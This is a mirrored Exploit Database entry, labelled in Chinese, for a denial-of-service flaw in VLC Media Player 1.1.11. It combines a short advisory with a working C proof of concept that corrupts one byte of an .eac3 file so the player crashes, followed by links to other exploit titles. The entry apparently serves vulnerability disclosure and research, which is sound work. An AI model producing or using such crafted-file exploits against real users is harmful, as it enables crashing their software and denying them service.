VideoLAN VLC Media Player 1.1.11 – ‘.EAC3’ File Denial of Service

Exploit Database
33 阅读

作者： Dan Fosco

日期： 2012-03-14
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/38940/

// source: https://www.securityfocus.com/bid/64626/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. 

# Exploit Title: VLC v. 1.1.11 .eac3 DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include <stdio.h>

int main(int argc, char *argv[])
{
	FILE *f;
	f = fopen(argv[1], "r+");
	fseek(f, 5, SEEK_SET);
	fputc('\x00', f);
	fclose(f);
	return 0;
}

//code updates eac3 file, can find samples on videolan ftp server

last Exploits
VideoLAN VLC Media Player 1.1.11 – ‘.EAC3’ File Denial of Service的更多信息

Adobe Flash – Overflow when Playing Sound：
FleaHttpd – Remote Denial of Service：
HP Data Protector Manager 6.11 – RDS Service Remote Denial of Service：
Quick TFTP Server Pro 2.2 – Denial of Service：
Easy CD & DVD Cover Creator 4.13 – Denial of Service (PoC)：
Microsoft Internet Explorer – MSHTML Findtext Processing：
Google Chrome < M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free：
Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl：